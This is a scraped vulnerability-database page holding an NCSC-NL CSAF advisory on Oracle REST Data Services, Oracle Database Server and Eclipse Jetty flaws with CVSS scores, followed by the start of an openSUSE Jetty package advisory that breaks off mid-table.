| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A vulnerability in Oracle REST Data Services (Mongoapi component) versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to gain unauthorized read access to certain data, rated CVSS 3.1 base score 5.3.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A critical vulnerability in Oracle Database Server Net Service (versions 23.4.0-23.26.2) allows unauthenticated network attackers via TLS to compromise confidentiality, integrity, and availability, with a CVSS 3.1 score of 9.0.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A vulnerability in Oracle Database Server Net Service component versions 23.4.0 to 23.26.2 allows unauthenticated attackers with TLS network access to cause denial of service by hanging or crashing the service, rated CVSS 7.5.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A vulnerability in Oracle Database Server Net Service component versions 23.4.0 to 23.26.2 allows unauthenticated attackers with TLS network access to cause denial of service by hanging or crashing the service, rated CVSS 7.5.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A critical vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows a low-privileged attacker with network access via HTTPS to fully compromise the service, with a CVSS 3.1 base score of 9.9.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A critical vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to fully compromise the service, with a CVSS 3.1 base score of 10.0.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to gain unauthorized read access to certain data, with a CVSS 3.1 base score of 5.3 indicating confidentiality impact.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to perform unauthorized update, insert, or delete operations, with a CVSS 3.1 base score of 5.3 indicating integrity impact.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
A vulnerability in Oracle REST Data Services versions 24.2.0 through 26.1.0 allows unauthenticated attackers with HTTPS network access to cause a partial denial of service, rated with a CVSS 3.1 base score of 5.3.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
|
vers:unknown/*
Oracle / Database Server
|
vers:unknown/* | ||
|
vers:unknown/*
Oracle / REST Data Services
|
vers:unknown/* |
| URL | Category |
|---|---|
| https://www.oracle.com/security-alerts/cspumay2026.html | external |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
| https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-… | self |
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"tlp": {
"label": "WHITE"
}
},
"lang": "nl",
"notes": [
{
"category": "legal_disclaimer",
"text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this page to enhance access to its information and security advisories. The use of this security advisory is subject to the following terms and conditions:\n\n NCSC-NL makes every reasonable effort to ensure that the content of this page is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or continuous keeping up-to-date. The information contained in this security advisory is intended solely for the purpose of providing general information to professional users. No rights can be derived from the information provided therein.\n\n NCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of this security advisory. This includes damage resulting from the inaccuracy of incompleteness of the information contained in the advisory.\n This security advisory is subject to Dutch law. All disputes related to or arising from the use of this advisory will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
},
{
"category": "description",
"text": "Oracle heeft kwetsbaarheden verholpen in Oracle REST Data Services (versies 24.2.0 tot 26.1.0) en Oracle Database Server (versies 23.4.0 tot 23.26.2).",
"title": "Feiten"
},
{
"category": "description",
"text": "De kwetsbaarheden in Oracle REST Data Services stellen een aanvaller met lage privileges en netwerktoegang via HTTPS in staat om zonder authenticatie verschillende acties uit te voeren, waaronder het volledig overnemen van de service, ongeautoriseerde toegang tot data, het wijzigen of verwijderen van data, en het veroorzaken van een denial-of-service. Sommige kwetsbaarheden maken het mogelijk om authenticatie te omzeilen en willekeurige acties uit te voeren binnen de getroffen omgeving. Daarnaast kunnen denial-of-service-condities worden veroorzaakt door het laten hangen of crashen van de service. In Oracle Database Server kunnen ongeauthenticeerde aanvallers met netwerktoegang via TLS de Net Service-component overnemen of een denial-of-service veroorzaken, wat impact heeft op vertrouwelijkheid, integriteit en beschikbaarheid. Verder is er een kwetsbaarheid in Eclipse Jetty\u0027s HTTP/1.1 parser die request smuggling mogelijk maakt door onjuiste verwerking van chunked transfer encoding extensions, wat kan leiden tot beveiligingsomzeilingen zoals cache poisoning en sessiekaping. Voor deze Jetty-kwetsbaarheid zijn momenteel geen patches of mitigaties beschikbaar.",
"title": "Interpretaties"
},
{
"category": "description",
"text": "Oracle heeft updates uitgebracht om de kwetsbaarheden in Oracle REST Data Services en Oracle Database Server te verhelpen. Voor de kwetsbaarheid in Eclipse Jetty\u0027s HTTP/1.1 parser zijn op dit moment geen patches of mitigaties beschikbaar. Zie bijgevoegde referenties voor meer informatie.",
"title": "Oplossingen"
},
{
"category": "general",
"text": "medium",
"title": "Kans"
},
{
"category": "general",
"text": "high",
"title": "Schade"
},
{
"category": "general",
"text": "Improper Privilege Management",
"title": "CWE-269"
},
{
"category": "general",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
},
{
"category": "general",
"text": "OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities",
"title": "CWE-937"
},
{
"category": "general",
"text": "OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities",
"title": "CWE-1035"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "cert@ncsc.nl",
"name": "Nationaal Cyber Security Centrum",
"namespace": "https://www.ncsc.nl/"
},
"references": [
{
"category": "external",
"summary": "Reference",
"url": "https://www.oracle.com/security-alerts/cspumay2026.html"
}
],
"title": "Kwetsbaarheden verholpen in Oracle Database Server",
"tracking": {
"current_release_date": "2026-05-29T12:20:31.706478Z",
"generator": {
"date": "2025-08-04T16:30:00Z",
"engine": {
"name": "V.A.",
"version": "1.3"
}
},
"id": "NCSC-2026-0169",
"initial_release_date": "2026-05-29T12:20:31.706478Z",
"revision_history": [
{
"date": "2026-05-29T12:20:31.706478Z",
"number": "1.0.0",
"summary": "Initiele versie"
}
],
"status": "final",
"version": "1.0.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-1"
}
}
],
"category": "product_name",
"name": "Database Server"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:unknown/*",
"product": {
"name": "vers:unknown/*",
"product_id": "CSAFPID-2"
}
}
],
"category": "product_name",
"name": "REST Data Services"
}
],
"category": "vendor",
"name": "Oracle"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-2332",
"cwe": {
"id": "CWE-444",
"name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)"
},
"notes": [
{
"category": "other",
"text": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
"title": "CWE-444"
},
{
"category": "description",
"text": "Eclipse Jetty\u0027s HTTP/1.1 parser improperly handles unclosed quoted strings in chunked transfer encoding extensions, enabling request smuggling attacks that can lead to security bypass, cache poisoning, and unauthorized HTTP request injection.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-2332 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-2332.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-2332"
},
{
"cve": "CVE-2026-35266",
"notes": [
{
"category": "description",
"text": "A vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows a low-privileged attacker with HTTPS network access to cause unauthorized data modification, access, or partial denial of service, with a CVSS 3.1 score of 7.9.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-35266 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-35266.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.9,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-35266"
},
{
"cve": "CVE-2026-35277",
"notes": [
{
"category": "description",
"text": "A vulnerability in Oracle REST Data Services (versions 24.2.0-26.1.0) allows low-privileged attackers with HTTPS network access to create, delete, or modify critical data, with a CVSS 3.1 base score of 8.1 indicating high confidentiality and integrity impact.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-35277 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-35277.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-35277"
},
{
"cve": "CVE-2026-46775",
"notes": [
{
"category": "description",
"text": "A critical vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows a low-privileged attacker with network access via HTTPS to fully compromise the service, with a CVSS 3.1 base score of 9.9.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46775 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46775.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46775"
},
{
"cve": "CVE-2026-46829",
"notes": [
{
"category": "description",
"text": "A denial of service vulnerability in Oracle REST Data Services (Mongoapi component) versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to hang or crash the service, rated CVSS 7.5.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46829 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46829.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46829"
},
{
"cve": "CVE-2026-46830",
"notes": [
{
"category": "description",
"text": "A vulnerability in Oracle REST Data Services (Mongoapi component) versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to gain unauthorized read access to certain data, rated CVSS 3.1 base score 5.3.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46830 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46830.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46830"
},
{
"cve": "CVE-2026-46833",
"notes": [
{
"category": "description",
"text": "A critical vulnerability in Oracle Database Server Net Service (versions 23.4.0-23.26.2) allows unauthenticated network attackers via TLS to compromise confidentiality, integrity, and availability, with a CVSS 3.1 score of 9.0.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46833 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46833.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46833"
},
{
"cve": "CVE-2026-46834",
"notes": [
{
"category": "description",
"text": "A vulnerability in Oracle Database Server Net Service component versions 23.4.0 to 23.26.2 allows unauthenticated attackers with TLS network access to cause denial of service by hanging or crashing the service, rated CVSS 7.5.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46834 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46834.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46834"
},
{
"cve": "CVE-2026-46835",
"notes": [
{
"category": "description",
"text": "A vulnerability in Oracle Database Server Net Service component versions 23.4.0 to 23.26.2 allows unauthenticated attackers with TLS network access to cause denial of service by hanging or crashing the service, rated CVSS 7.5.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46835 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46835.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46835"
},
{
"cve": "CVE-2026-46839",
"notes": [
{
"category": "description",
"text": "A critical vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows a low-privileged attacker with network access via HTTPS to fully compromise the service, with a CVSS 3.1 base score of 9.9.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46839 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46839.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.9,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46839"
},
{
"cve": "CVE-2026-46840",
"notes": [
{
"category": "description",
"text": "A critical vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to fully compromise the service, with a CVSS 3.1 base score of 10.0.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46840 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46840.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46840"
},
{
"cve": "CVE-2026-46841",
"notes": [
{
"category": "description",
"text": "A vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to gain unauthorized read access to certain data, with a CVSS 3.1 base score of 5.3 indicating confidentiality impact.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46841 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46841.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46841"
},
{
"cve": "CVE-2026-46842",
"notes": [
{
"category": "description",
"text": "A vulnerability in Oracle REST Data Services versions 24.2.0 to 26.1.0 allows unauthenticated attackers with HTTPS network access to perform unauthorized update, insert, or delete operations, with a CVSS 3.1 base score of 5.3 indicating integrity impact.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46842 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46842.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46842"
},
{
"cve": "CVE-2026-46843",
"notes": [
{
"category": "description",
"text": "A vulnerability in Oracle REST Data Services versions 24.2.0 through 26.1.0 allows unauthenticated attackers with HTTPS network access to cause a partial denial of service, rated with a CVSS 3.1 base score of 5.3.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-46843 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2026/cve-2026-46843.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2"
]
}
],
"title": "CVE-2026-46843"
}
]
}
OPENSUSE-SU-2026:10574-1
Vulnerability from csaf_opensuse - Published: 2026-04-18 00:00 - Updated: 2026-04-18 00:00| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-annotations-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-ant-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-cdi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-client-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-client-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-client-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-client-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-continuation-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-deploy-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-fcgi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-http-spi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-io-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-io-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-io-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-io-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaas-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jaspi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jmx-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jndi-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-jsp-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-minimal-javadoc-9.4.58-4.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:jetty-openid-9.4.58-4.1.s390x | — |
